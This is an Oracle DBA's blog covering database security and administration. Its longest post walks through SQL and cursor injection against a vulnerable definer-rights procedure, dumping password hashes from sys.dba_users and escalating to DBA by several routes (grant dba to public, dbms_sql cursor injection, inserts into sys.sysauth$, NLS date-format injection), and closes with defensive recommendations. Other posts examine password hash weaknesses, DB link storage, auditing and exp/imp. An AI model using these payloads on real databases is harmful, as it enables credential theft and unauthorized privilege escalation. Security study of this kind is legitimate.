Yaping's Weblog

September 2, 2008

SQL/Cursor injection

Filed under: Oracle — Yaping @ 2:29 am
Tags:

sys@TEST>create or replace procedure get_owner(p_obj varchar2) is
  2  type t_cur is ref cursor;
  3  v_cur   t_cur;
  4  v_owner varchar2(30);
  5  begin
  6    dbms_output.enable(1000000);
  7    open v_cur for ’select owner from all_objects where object_name = ”’||p_obj||””;
  8    loop
  9       fetch v_cur into v_owner;
 10       dbms_output.put_line(v_owner);
 11       exit when v_cur%notfound;
 12    end loop;
 13
 14    close v_cur;
 15  end;
 16  /
Procedure created.

sys@TEST>grant execute on get_owner to public;
Grant succeeded.

sys@TEST>conn test/test
Connected.

test@TEST>select username from sys.dba_users;
select username from sys.dba_users
                         *
ERROR at line 1:
ORA-00942: table or view does not exist

test@TEST >exec sys.get_owner(’T’);
PL/SQL procedure successfully completed.

test@TEST >exec sys.get_owner(’T” or ”a”=”a’);
SYS
SYS
… …
 
test@TEST>exec sys.get_owner(’T” union all select username from sys.dba_users union all select password from sys.dba_users–’);
OPS$ADMIN
TEST
CSMIG
SYS
SYSTEM
TSMSYS
CTXSYS
OUTLN
DIP
DBSNMP
FDFF0B0C32E1E432
7A0F2B316C212D67
09B4BB013FBD0D65
2A244059C05B5F54
292EB6812EBA50C2
3DF26A8B17D0F29F
71E687F036AD56E5
4A3BA55E08595C81
CE4A36B8E06CA59C
E066D214D5421CCC
E066D214D5421CCC
PL/SQL procedure successfully completed.

Now we get users’ password hash value, such as SYS’s is 09B4BB013FBD0D65. Now we can use tool to brute force password.

test@TEST>create or replace function get_dba
  2  return varchar
  3  authid current_user is
  4  pragma autonomous_transaction;
  5  begin
  6    execute immediate ‘grant dba to public’;
  7    return ‘GOT_DBA_PRIVS’;
  8  end;
  9  /
Function created.

test@TEST>
test@TEST>exec sys.get_owner(’T”||test.get_dba–’);
PL/SQL procedure successfully completed.

test@TEST>set role dba;
Role set.

Since Oracle 10g R2, it introduces one package called DBMS_ASSERT, can be used to check schema, objects, SQL valid.

test@TEST>declare
  2    v_cur number;
  3    v_res number;
  4  begin
  5    v_cur:=dbms_sql.open_cursor;
  6    dbms_sql.parse(v_cur,’select 1 from dual’,0);
  7    v_res:=dbms_sql.execute(v_cur);
  8    dbms_sql.close_cursor(v_cur);
  9  end;
 10  /
PL/SQL procedure successfully completed.

We tie the cursor to a query, the cursor like a handle to this query which is then executed using dbms_sql.execute function. An attacker can execute arbitrary SQL in an open cursor and parse the SQL and then inject the dbms_sql.execute function into the vulnerable PL/SQL object:

test@TEST>set serveroutput on
test@TEST>declare
  2    v_cur number;
  3  begin
  4    v_cur:=dbms_sql.open_cursor;
  5    dbms_sql.parse(v_cur,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to public”; commit; end;’,0);
  6    dbms_output.put_line(’cursor value is: ‘||v_cur);
  7  end;
  8  /
cursor value is: 4
PL/SQL procedure successfully completed.

test@TEST>exec sys.get_owner(’T”||chr(dbms_sql.execute(4))–’);
PL/SQL procedure successfully completed.

test@TEST>set role dba;
Role set.

Assume, rather than execute ‘GRANT DBA TO PUBLIC’, which might alert an intrusion detection/prevention system, the attacker wishes to perform an INSERT to achieve the same end, in other words, INSERT the relevant rows into the SYS.SYSAUTH$ table to make PUBLIC a DBA.

sys@TEST>create user dummy identified by dummy;
User created.
sys@TEST>grant create session to dummy;
Grant succeeded.
 sys@TEST>conn dummy/dummy
Connected.
dummy@TEST>select * from session_roles;
no rows selected
dummy@TEST>set serveroutput on
dummy@TEST>declare
  2    v_cur number;
  3  begin
  4    v_cur:=dbms_sql.open_cursor;
  5    dbms_sql.parse(v_cur,’declare pragma autonomous_transaction; begin execute immediate ”create or replace function dummy_f(p_stmt varchar2) return number authid current_user is begin execute immediate p_stmt; return 1; end;”; commit; end;’,0);
  6    dbms_output.put_line(’cursor value is: ‘||v_cur);
  7  end;
  8  /
cursor value is: 2
PL/SQL procedure successfully completed.
 
dummy@TEST>exec sys.get_owner(’T”||chr(dbms_sql.execute(2))–’);
PL/SQL procedure successfully completed.
dummy@TEST>select dummy_f(’select 1 from dual’) from dual;
DUMMY_F(’SELECT1FROMDUAL’)
————————–
                         1
dummy@TEST>exec sys.get_owner(’T”||chr(dummy.dummy_f(”declare pragma autonomous_transaction; begin execute immediate ””insert into sys.sysauth$ (grantee#,privilege#,sequence#) values (1,4,(select max(sequence#)+1 from sys.sysauth$))””; commit; end;”))–’);
BEGIN sys.get_owner(’T”||chr(dummy.dummy_f(”declare pragma autonomous_transaction; begin execute immediate ””insert into sys.sysauth$ (grantee#,privilege#,sequence#) values (1,4,(select max(sequence#)+1 from sys.sysauth$))””; commit; end;”))–’); END;
*
ERROR at line 1:
ORA-00001: unique constraint (SYS.I_SYSAUTH1) violated
ORA-06512: at line 1
ORA-06512: at “DUMMY.DUMMY_F”, line 1
ORA-06512: at “SYS.GET_OWNER”, line 7
ORA-06512: at line 1

dummy@TEST>set role dba;
Role set.

10g will be unique constraint violated, but the insertion success still.

Generally, Date & Number data type parameter in function/procedure are considered to input data safely. Is it so?

sys@CHEN>create or replace procedure p_date(p_date date) is
  2    stmt varchar2(200);
  3  begin
  4    stmt:=’select object_name from all_objects where created = ”’ || p_date || ””;
  5    dbms_output.put_line(stmt);
  6    execute immediate stmt;
  7  end;
  8  /
Procedure created.
 
sys@CHEN>grant execute on p_date to public;
Grant succeeded.

test@CHEN>exec sys.p_date(”’ and test.get_dba()=”GOT_DBA_PRIVS”–’);
BEGIN sys.p_date(”’ and test.get_dba()=”GOT_DBA_PRIVS”–’); END;
*
ERROR at line 1:
ORA-01858: a non-numeric character was found where a numeric was expected
ORA-06512: at line 1
test@CHEN>alter session set nls_date_format = ‘”” and test.get_dba()=”GOT_DBA_PRIVS”–”‘;
Session altered.
test@CHEN>select sysdate from dual;
SYSDATE
————————————–
‘ and test.get_dba()=’GOT_DBA_PRIVS’–
test@CHEN>exec sys.p_date(”’ and test.get_dba()=”GOT_DBA_PRIVS”–’);
select object_name from all_objects where created = ” and test.get_dba()=’GOT_DBA_PRIVS’–’
PL/SQL procedure successfully completed.

test@CHEN>set role dba;
Role set.

Now we use procedure without parameter and use cursor to attach attack sql.

sys@TEST>create or replace procedure p_date is
  2    stmt varchar2(200);
  3    v_date date := sysdate;
  4  begin
  5    stmt:=’select object_name from all_objects where created = ”’ || v_date || ””;
  6    dbms_output.put_line(stmt);
  7    execute immediate stmt;
  8  end;
  9  /
Procedure created.

sys@TEST>grant execute on p_date to public;
Grant succeeded.

test@TEST>set serveroutput on
test@TEST>declare
  2    v_cur number;
  3  begin
  4    v_cur := dbms_sql.open_cursor();
  5    dbms_sql.parse(v_cur,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to public”; commit; end;’,0);
  6    dbms_output.put_line(’cursor is: ‘|| v_cur);
  7  end;
  8  /
cursor is: 2
PL/SQL procedure successfully completed.

test@TEST>alter session set nls_date_format = ‘”” AND DBMS_SQL.EXECUTE(2)=1–”‘;
Session altered.

test@TEST>select sysdate from dual;
SYSDATE
—————————–
‘ AND DBMS_SQL.EXECUTE(2)=1–

test@TEST>exec sys.p_date;
select object_name from all_objects where created = ” AND DBMS_SQL.EXECUTE(2)=1–’
PL/SQL procedure successfully completed.

test@TEST>set role dba;
Role set.

Recommends
1.       If concatenation is necessary then check the input for malicious code, eliminate illegal characters, such as punctuation, or, union;
2.       If possible, do not use dynamic PL/SQL;
3.       If dynamic PL/SQL is necessary then use bind variables;
4.       Use the principle of least privilege and ensure that the users created for the applications have the privileges needed and all extra privileges (such as PUBLIC ones) are not available.

Advertisements

How to check objects changed/accessed?

Filed under: Oracle — Yaping @ 2:28 am
Tags:

Sometimes we need to track objects, determine if objects be changed.
Timestamp is not always a good track to identify objects changed.

@>create or replace function f_test(p_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>select CREATED,LAST_DDL_TIME from dba_objects where OBJECT_NAME=’F_TEST’;
CREATED             LAST_DDL_TIME
——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:43:38

@>select CTIME,MTIME,STIME from obj$ where NAME=’F_TEST’;
CTIME               MTIME               STIME
——————- ——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:43:38 2007-12-21 23:43:38

@>alter function f_test compile;
Function altered.

@>select CREATED,LAST_DDL_TIME from dba_objects where OBJECT_NAME=’F_TEST’;
CREATED             LAST_DDL_TIME
——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:48:19

@>select CTIME,MTIME,STIME from obj$ where NAME=’F_TEST’;
CTIME               MTIME               STIME
——————- ——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:48:19 2007-12-21 23:43:38

@>create or replace function f_test(p_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>
@>select CREATED,LAST_DDL_TIME from dba_objects where OBJECT_NAME=’F_TEST’;
CREATED             LAST_DDL_TIME
——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:49:53

@>select CTIME,MTIME,STIME from obj$ where NAME=’F_TEST’;
CTIME               MTIME               STIME
——————- ——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:49:53 2007-12-21 23:49:53

DBA_OBJECTS.LAST_DDL_TIME refers to obj$.MTIME.
Even though this function contents doesn’t change, but the timestamp all changed.

@>select dbms_utility.get_hash_value(dbms_metadata.get_ddl(’FUNCTION’,’F_TEST’,user),3,1073741824) from dual;
DBMS_UTILITY.GET_HASH_VALUE(DBMS_METADATA.GET_DDL(’FUNCTION’,’F_TEST’,USER),3,1073741824)
—————————————————————————————–
                                                                                142768459

@>create or replace function f_test(p_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>select dbms_utility.get_hash_value(dbms_metadata.get_ddl(’FUNCTION’,’F_TEST’,user),3,1073741824) from dual;
DBMS_UTILITY.GET_HASH_VALUE(DBMS_METADATA.GET_DDL(’FUNCTION’,’F_TEST’,USER),3,1073741824)
—————————————————————————————–
                                                                                142768459

@>
@>create or replace function f_test(P_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>select dbms_utility.get_hash_value(dbms_metadata.get_ddl(’FUNCTION’,’F_TEST’,user),3,1073741824) from dual;
DBMS_UTILITY.GET_HASH_VALUE(DBMS_METADATA.GET_DDL(’FUNCTION’,’F_TEST’,USER),3,1073741824)
—————————————————————————————–
                                                                                629865228

If use hash value to determine objects changed, we must store hash value firstly, then we have base value to compare. We can also use dbms_obfuscation_toolkit to compute hash value.

Audit is important to track objects changed or accessed. Since Oracle 10g R2, if you set audit_trail=DB_EXTENDED, triggered SQL statement be recorded in aud$.SQLTEXT, but before Oracle 10g, aud$ table doesn’t record the SQL statements, for ddl operation, you can use trigger to accomplish it (see Appendix A), for select statements, you can use fine grained auditing (DBMS_FGA).

10g
sys@TEST>@getvv audit
       NUM NAME                            ORD VALUE                ISDEFAULT
———- ——————– ————– ——————– ——————–
       938 audit_trail                       1 DB                   FALSE
           audit_trail                       2 OS                   FALSE
           audit_trail                       3 NONE                 FALSE
           audit_trail                       4 TRUE                 FALSE
           audit_trail                       5 FALSE                FALSE
           audit_trail                       6 DB_EXTENDED          FALSE
           audit_trail                       7 XML                  FALSE
           audit_trail                       8 EXTENDED             FALSE

 
Appendix A
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
– refer to Application Developer’s Guide – Fundamentals
– logon as sys

whenever sqlerror exit failure;

create table audit_trail
(USERNAME     VARCHAR2(30),
MACHINE       VARCHAR2(64),
CLIENT_IP     VARCHAR2(15),
OS_USER       VARCHAR2(30),
OWNER         VARCHAR2(30),
OBJECT_NAME   VARCHAR2(30),
OBJECT_TYPE   VARCHAR2(18),
ACTION        VARCHAR2(30),
SQL_TEXT      VARCHAR2(4000),
TIME          DATE);

create or replace trigger audit_ddl_trigger
  after ddl on database
declare
  n        number;
  stmt     varchar2(4000);
  sql_text ora_name_list_t;
begin
  n := ora_sql_txt(sql_text);
  for i in 1..n loop
      stmt := stmt || sql_text(i);
  end loop;

  insert into audit_trail(username,machine,client_ip,os_user,owner,object_name,object_type,action,sql_text,time)
  values(ora_login_user,SYS_CONTEXT(’USERENV’,’HOST’),SYS_CONTEXT(’USERENV’,’IP_ADDRESS’),
         SYS_CONTEXT(’USERENV’,’OS_USER’),ora_dict_obj_owner,ora_dict_obj_name,ora_dict_obj_type,
         ora_sysevent,stmt,sysdate);

exception
  when others then
    NULL;
end;
/

Password Cracking

Filed under: Oracle — Yaping @ 2:27 am
Tags:

There’re many tools used to crack password, such as orabf, on one P4 2.0G CPU machine, it can compute about one million hash value per second.

We can also store password and its hash value pair in files, called rainbow table, then use hash value to compare value in this file. It’s especial useful for known users, such as sys, system.

DB Link

Filed under: Oracle — Yaping @ 2:26 am
Tags:

Prior 10g, password for DB link stores in DB with clear text, it has been changed since 10g.

Oracle 9i
@>show user
USER is “TEST”
@>create database link l_test connect to test identified by test using ‘test’;
Database link created.
@>select dbms_metadata.get_ddl(’DB_LINK’,’L_TEST’,user) from dual;
DBMS_METADATA.GET_DDL(’DB_LINK’,’L_TEST’,USER)
——————————————————————————–
  CREATE DATABASE LINK “L_TEST”
   CONNECT TO “TEST” IDENTIFIED BY “TEST“
   USING ‘test’

@>conn /as sysdba
Connected.
@>select NAME,USERID,PASSWORD from link$;
NAME                           USERID                         PASSWORD
—————————— —————————— ——————————
L_TEST                         TEST                           TEST

 
10g
test@TEST>show user
USER is “TEST”
test@TEST>create database link l_chen connect to test identified by test using ‘chen’;
Database link created.
test@TEST>select DB_LINK,USERNAME from user_db_links;
DB_LINK                                            USERNAME
————————————————– ——————————
L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM             TEST
test@TEST>select dbms_metadata.get_ddl(’DB_LINK’,’L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM’,user) from dual;
DBMS_METADATA.GET_DDL(’DB_LINK’,’L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM’,USER)
——————————————————————————–
  CREATE DATABASE LINK “L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM”
   CONNECT TO “TEST” IDENTIFIED BY VALUES ‘05C9398288555E95E498B33A68083EDD2E’
   USING ‘chen’

test@TEST>conn /as sysdba
Connected.
sys@TEST>select NAME,USERID,PASSWORD,PASSWORDX from link$;
NAME                                     USERID     PASSWORD   PASSWORDX
—————————————- ———- ———- —————————————-
L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM   TEST                  05C9398288555E95E498B33A68083EDD2E

 
The DBLINK_ENCRYPT_LOGIN initialization parameter is used for connections between two Oracle servers (for example, when performing distributed queries).
Whenever you attempt to connect to a server using a password, Oracle encrypts the password before sending it to the server. If the connection fails and auditing is enabled, the failure is noted in the audit log. Oracle then checks the appropriate DBLINK_ENCRYPT_LOGIN. If it set to FALSE, Oracle attempts the connection again using an unencrypted version of the password. If the connection is successful, the connection replaces the previous failure in the audit log, and the connection proceeds. To prevent malicious users from forcing Oracle to re-attempt a connection with an unencrypted version of the password, you must set the appropriate values to TRUE.

Password

Filed under: Oracle — Yaping @ 2:25 am
Tags: ,

The main password encryption principles are:
1.       Enforcement of Complex Passwords
2.       Use of Salted Passwords
3.       Slow One-way Algorithm

We should consider to forcibly use complex password and password lifetime, this principle can be defined within the system. At the same time, we also should consider to adopt password management tools, such as password2000, to mange password conveniently.
It will be hard to crack the password if salted value is used, even though this salted value is clear text or known.
Slow one-way algorithm makes encrypt slowly, it need more time to get the final cipher. And we can change the encrypt algorithm at the mid-way, it will be more difficult to crack this algorithm.
Assume that it can calculate 1 million final ciphers every one second if it uses one pass to encrypt password. It’ll be just 10 thousand final ciphers if use the calculated value to repeat encrypt 1 hundred times. This means it needs one day to crack out the password before, now it needs 100 days. If the password lifetime is 30 days, this password has been changed before the old password is cracked.

Oracle Password Mechanism:
1.       Concatenate the username and the password to produce a plaintext string;
2.       Convert the plaintext string to uppercase characters;
3.       Convert the plaintext string to multi-byte storage format; ASCII characters have the high byte set to 0×00;
4.       Encrypt the plaintext string (padded with 0s if necessary to the next even block length) using the DES algorithm in cipher block chaining (CBC) mode with a fixed key value of 0×0123456789ABCDEF;
5.       Encrypt the plaintext string again with DES-CBC, but using the last block of the output of the previous step (ignoring parity bits) as the encryption key. The last block of the output is converted into a printable string to produce the password hash value.

Weak Salt Selection
Oracle password hashes use a non-conventional technique for salt selection by prepending the username to the password before calculating the hash.

Firstly, it is quite possible to obtain information about a user password based solely on its hash value and the known credentials of another user.

A second weakness is the use of non-random salt values. Although the salt used can still reduce the effectiveness of a precomputed dictionary attack against a large password hash table, an attacker could still precompute a table of possible passwords using a common username (e.g. SYSTEM), and use it to attempt to recover the password for this particular user in many different systems.

@>alter user system identified by p1;
User altered.
@>alter user sys identified by temp1;
User altered.
@>select username, password from dba_users where username like ‘SYS%’;
USERNAME                       PASSWORD
—————————— ——————————
SYS                            2E1168309B5B9B7A
SYSTEM                         2E1168309B5B9B7A

Lack of Case Preservation
Another weakness in the Oracle password hashing mechanism is the lack of alphabetic case preservation. Before the password hash is calculated, the user’s password is converted to all uppercase characters, regardless of the input case selection.
This behaviour represents a significant weakness in the password hashing algorithm, as it reduces the number of possible passwords,

@>alter user system identified by P1;
User altered.
@>select username, password from dba_users where username = ‘SYSTEM’;
USERNAME                       PASSWORD
—————————— ——————————
SYSTEM                         2E1168309B5B9B7A

Recommends
1.       Force complex password & length
Force use complex password. Refer to ?/rdbms/admin/utlpwdmg.sql.
We must specify a standalone function owned by SYS, but can use subprocedures/functions/package in this function.
We can use double quotation marks to involved special symbol, increases the choice of characters. But in some logon tools, it maybe encounter issues.

2.       Force password lifetime
Specify profile attribute to limit password lifetime. If this password policy has been introduced, password changed will be recorded in user_history$ table.

Since Oracle 10g R2, the default profile’s password life changed from unlimited to 10 days, if your database be upgraded from low release, use the default profile and PASSWORD_LIFE_TIME is unlimited, then you need keep an eye on it.

3.       Lock unused accounts, change default password

4.       Restrict access to password hashes & Audit

@>audit SELECT on dba_users;
Audit succeeded.

@>audit select on sys.user$;
audit select on sys.user$
                    *
ERROR at line 1:
ORA-00701: object necessary for warmstarting database cannot be altered

User$ is a specific table, used when database bootstrap, you can’t audit it.

Change password through password command, the password will be encrypted and then be sent through network.
While alter user XXX identified by command will be sent with clear text.

@>password
Changing password for TEST
Old password: ****
New password: ****
Retype new password: ****
Password changed

 
Changed in 11g

@>alter user system identified by p1;
User altered.
@>select USERNAME,PASSWORD from dba_users where USERNAME=’SYSTEM’;
USERNAME                       PASSWORD
—————————— ——————————
SYSTEM
@>select NAME,PASSWORD,SPARE4 from user$ where NAME=’SYSTEM’;
NAME                 PASSWORD                       SPARE4
——————– —————————— ——————————————————————————–
SYSTEM               2E1168309B5B9B7A               S:8388CBF57687E6E8CF97BB672C2EDE394140FADE024E16329E8A2BF2E9BF

@>alter user system identified by p1;
User altered.
@>select NAME,PASSWORD,SPARE4 from user$ where NAME=’SYSTEM’;
NAME                 PASSWORD                       SPARE4
——————– —————————— ——————————————————————————–
SYSTEM               2E1168309B5B9B7A               S:09043B9ABFA366DF41DD16DE6768FDC04C57EF1374E0B04DAC8616716074

[oracle@chen ~]$ echo -ne “p1\x74\xE0\xB0\x4D\xAC\x86\x16\x71\x60\x74″|sha1sum
09043b9abfa366df41dd16de6768fdc04c57ef13  –

sys@DMS>@getPar
Enter value for parameter: case
old   6: ksppinm like lower(’%&parameter%’)
new   6: ksppinm like lower(’%case%’)
NAME                                     VALUE                                    DESCRIPTION
—————————————- —————————————- —————————————-
_case_sensitive_logon                    TRUE                                     case sensitive logon enabled
sec_case_sensitive_logon                 TRUE                                     case sensitive password enabled for logon

sys@DMS>alter user test identified by test;
sys@DMS>conn test/test
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.

test@DMS>conn /as sysdba
Connected.
sys@DMS>show sqlcase
sqlcase UPPER
sys@DMS>conn test/TEST
Connected.
test@DMS>conn /as sysdba
Connected.
sys@DMS>set sqlcase mixed
sys@DMS>alter user test identified by Test;
sys@DMS>conn test/TEST
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
sys@DMS>conn test/Test
Connected.

You can find that password hash value doesn’t display in dba_users. There’re two password encryption values in user$, one is the same as before, this is still one weakness, another encrypted with SHA-1, it changes every time when changed password, even though the password is the same (is the time be used to generate salt?). There’s one initial parameter to control password case-sensitive.
The new encryption algorithm is simple. Oracle generates 10 bytes salt, the password and the salt are concatenated and SHA-1 hash is generated from the concatenated value. The result value is stored in the spare4 column of the sys.user$ table.

Oracle Security

Filed under: Oracle — Yaping @ 2:24 am
Tags:

If you can’t stop them getting in, catch them on the way out.

 

Topics

Password

DB Link

Password Cracking

Track Objects Changed/Accessed

SQL/Cursor Injection

Startup Files

Change Password with BBED

Vulnerable Packages

Network

 

Note: All test cases are done on Oracle 92040 or 92080 or 10203 or 11106 under RHEL AS 4 without CPU applied.

 

 

References

http://www.petefinnigan.com/

http://www.red-database-security.com/

http://www.databasesecurity.com/

http://www.ngssoftware.com/

http://www.toolcrypt.org/

http://www.freelists.org/

http://www.phenoelit.net/

http://www.soonerorlater.hu/

The Oracle Hacker’s Handbook: Hacking and Defending Oracle [by David Litchfield]

 

 

 

 

Rollback Segments Corruption

Filed under: Oracle — Yaping @ 2:15 am
Tags: ,

If the rollback segments corrupt, we should recover it from backup. Sometimes there’s no backup or it’s not necessary to recover, we maybe consider using undocument parameter to avoid access these rollback segments. Oracle provides _offline_rollback_segments and _corrupted_rollback_segments, before use them, we should be clear the difference between them.

 

When opening a database, any rollback segments listed in _offline_rollback_segments or _corrupted_rollback_segments parameter:

l         Are not scanned, and any active transactions are neither marked as dead nor rolled back;

l         Appear offline in undo$;

l         Can’t be acquired by instance for new transaction;

 

Note that although the rollback segments listed in _offline_rollback_segments, Oracle actually reads the segments to find transaction status and gather undo records to perform rollback. If a corrupt block is found, the oracle will still fail.

 

If an open ITL is found to associated with _corrupted_rollback_segments the segment is not read to find the transaction status:

It is as though the rollback segment had been dropped, the transaction is assumed to be committed and delayed block cleanout is performed;

So the transaction was not committed, logical corruption will occur.

 

 

Session 1

test@CHEN>create table t1 as select rownum id from dual connect by level<6;

Table created.

 

test@CHEN>delete t1 where id=5;

1 row deleted.

 

test@CHEN>select * from t1;

 

        ID

———-

         1

         2

         3

         4

 

test@CHEN>@myid

Wrote file /tmp/myvar.sql

sid:11 serial:4 pid:12 spid:12961

 

Session 2

test@CHEN>insert into t1 values(6);

1 row created.

 

test@CHEN>select * from t1;

        ID

———-

         1

         2

         3

         4

         5

         6

6 rows selected.

 

test@CHEN>@myid

Wrote file /tmp/myvar.sql

sid:15 serial:17 pid:13 spid:12981

 

Session 3

sys@CHEN>@tran1

       SID    SERIAL# USERNAME                 XIDUSN    XIDSLOT     XIDSQN SEGMENT_NAME

———- ———- ——————– ———- ———- ———- ——————————

        15         17 TEST                          8          7        368 _ YSSMU8$S

        11          4 TEST                          2         40        401 _SYSSMU2$

 

sys@CHEN>@getpar _offline_rollback_segments

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_offline_rollback_segments                                                        offline undo segment list

 

sys@CHEN>@getpar _corrupted_rollback_segments

ANAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_corrupted_rollback_segments                                                      corrupted undo segment list

 

sys@CHEN>alter system set “_offline_rollback_segments”=”_SYSSMU8$” scope=spfile;

 

sys@CHEN>alter system set “_corrupted_rollback_segments”=”_SYSSMU2$” scope=spfile;

 

sys@CHEN>alter system checkpoint;

 

sys@CHEN>shutdown abort

ORACLE instance shut down.

 

sys@CHEN>startup mount

ORACLE instance started.

Total System Global Area  487658188 bytes

Fixed Size                   451276 bytes

Variable Size             369098752 bytes

Database Buffers          117440512 bytes

Redo Buffers                 667648 bytes

Database mounted.

 

sys@CHEN>alter system set events ‘10226 trace name context forever’;

 

sys@CHEN>alter database open;

 

sys@CHEN>select NAME,STATUS$ from undo$;

NAME                                        STATUS$

—————————————- ———-

SYSTEM                                            3

_SYSSMU1$                                         3

_SYSSMU2$                                         5

_SYSSMU3$                                         3

_SYSSMU4$                                         3

_SYSSMU5$                                         3

_SYSSMU6$                                         3

_SYSSMU7$                                         3

_SYSSMU8$                                         5

_SYSSMU9$                                         3

_SYSSMU10$                                        3

 

Session 4

test@CHEN>select * from t1;

        ID

———-

         1

         2

         3

         4

 

The trace file shows that Oracle uses the segments listed in _offline_rollback_segments to perform read consistent.

applied to 0x519bc014:

KTB Redo

op: 0x03  ver: 0x01

op: Z

KDO Op code: DRP row dependencies Disabled

  xtype: CR  bdba: 0x00c00013  hdba: 0x00c00011

itli: 1  ispac: 0  maxfr: 4863

tabn: 0 slot: 0(0x0)

 

August 30, 2008

exp/imp

Filed under: Oracle — Yaping @ 4:48 am
Tags: ,

l         Order of exp/imp tables

We create five tables, named d1, c2, a3, b4, e5, and created by this order.

 

SQL> conn test/test

Connected.

SQL> create table d1(id number);

Table created.

SQL> create table c2(id number);

Table created.

SQL> create table a3(id number);

Table created.

SQL> create table b4(id number);

Table created.

SQL> create table e5(id number);

Table created.

 

Then we export tables by owner mode.

 

$exp test/test file=test.dmp

Export: Release 9.2.0.4.0 – Production on Mon Jun 11 00:40:03 2007

……

. about to export TEST’s tables via Conventional Path …

. . exporting table                             A3          0 rows exported

. . exporting table                             B4          0 rows exported

. . exporting table                             C2          0 rows exported

. . exporting table                             D1          0 rows exported

. . exporting table                             E5          0 rows exported

……

 

We can find that order of tables exported is according to character order of the table’s name, not the order of creating, or others.

Then we export tables by table mode.

 

$exp test/test tables=(d1,c2,b4,e5,a3) file=test.dmp

……

About to export specified tables via Conventional Path …

. . exporting table                             D1          0 rows exported

. . exporting table                             C2          0 rows exported

. . exporting table                             B4          0 rows exported

. . exporting table                             E5          0 rows exported

. . exporting table                             A3          0 rows exported

……

 

We can find that order of tables exported is according to order of tables specified.

Then we import tables by table mode.

 

$imp test/test tables=(a3,c2) file=test.dmp ignore=y

……

. importing TEST’s objects into TEST

. . importing table                           “C2”          0 rows imported

. . importing table                           “A3”          0 rows imported

……

 

We find that importing order is relative to order of tables stored in the dump file, not the order by specified. It is expected.

 

According to the result, we should consider, when we archive data through export tables, those tables should be specified ahead which maybe be restored more frequently, especially when dump files is very large.

 

 

l         Rearrange data order

When we reorganize data or transmit data between databases via exp/imp utilities, we maybe need to reorganize data order according to characteristic of the applications, in order to optimize performance.

Such as, some queries via index range scan query are very frequent. And the associated indexed columns on the based table are very dispersive. The query maybe is inefficient and the same or continuous data should be arranged together.

Opposite, in some applications, the accessed data are so compact, and raise hot block conflict, etc. So the data may be dispersed.

 

Here I introduce QUERY parameter to achieve it.

 

SQL> create table t1 as select round(dbms_random.value*10000) id,owner||’.’||object_name name,rownum seq from all_objects where rownum<1000;

 

SQL> l

  1* select * from t1 where rownum<10

SQL> /

 

        ID NAME                                                      SEQ

———- ————————————————– ———-

      5326 SYS.AGGXMLIMP                                               1

      7180 SYS.AGGXMLINPUTTYPE                                         2

      1511 SYS.ALL_ALL_TABLES                                          3

      9381 SYS.ALL_APPLY                                               4

      1090 SYS.ALL_APPLY_CONFLICT_COLUMNS                              5

       216 SYS.ALL_APPLY_DML_HANDLERS                                  6

      5032 SYS.ALL_APPLY_ERROR                                         7

      3314 SYS.ALL_APPLY_KEY_COLUMNS                                   8

      2363 SYS.ALL_APPLY_PARAMETERS                                    9

9 rows selected.

 

$exp test/test tables=(t1) query=(\”where 1=1 order by id\”) file=t1_o.dmp

 

SQL> truncate table t1;

Table truncated.

 

$imp test/test file=t1_o.dmp ignore=y

SQL> select * from t1 where rownum<10;

 

        ID NAME                                                      SEQ

———- ————————————————– ———-

        33 SYS.GV_$AW_OLAP                                           510

        48 SYS.EXU8IOVU                                              396

        79 SYS.EXU8JBQU                                              398

        84 SYS.KU$_M_VIEW_SRT_LIST_T                                 664

        88 SYS.EXU9FGA                                               460

        91 SYS.DICTIONARY                                            318

        94 SYS.AQ$_REG_INFO_LIST                                     219

       127 SYS.EXU9COOU                                              455

       128 SYS.SYSSEGOBJ                                             932

9 rows selected.

 

 

l         DDL text in dump file is visible and can be edited

In some situations, we can edit dump file to resolve special problems. Here I use one demo to explain it.

In some systems, there are many user-defined types. Assume source scheme and target scheme have the same structure user-defined type, and these types are being used. So when we import data with these types, it will fail to import, because these types have been existed. But we can’t drop the types also.

We may be able to modify the dump file directly to resolve this problem.

 

SQL> show user

USER is “TEST”

 

SQL> create or replace type t_mytest as varray(10) of number;

  2  /

Type created.

SQL> create table t2(name varchar2(30),member t_mytest);

Table created.

SQL> insert into t2 select object_name,t_mytest(rownum,rownum+1,rownum+2) from all_objects where rownum<100;

99 rows created.

SQL> commit;

Commit complete.

SQL> select * from t2 where rownum<10;

 

NAME                           MEMBER

—————————— ————————————————–

ACCESS$                        T_MYTEST(1, 2, 3)

AGGXMLIMP                      T_MYTEST(2, 3, 4)

AGGXMLINPUTTYPE                T_MYTEST(3, 4, 5)

ALL_ALL_TABLES                 T_MYTEST(4, 5, 6)

ALL_APPLY                      T_MYTEST(5, 6, 7)

ALL_APPLY_CONFLICT_COLUMNS     T_MYTEST(6, 7, 8)

ALL_APPLY_DML_HANDLERS         T_MYTEST(7, 8, 9)

ALL_APPLY_ERROR                T_MYTEST(8, 9, 10)

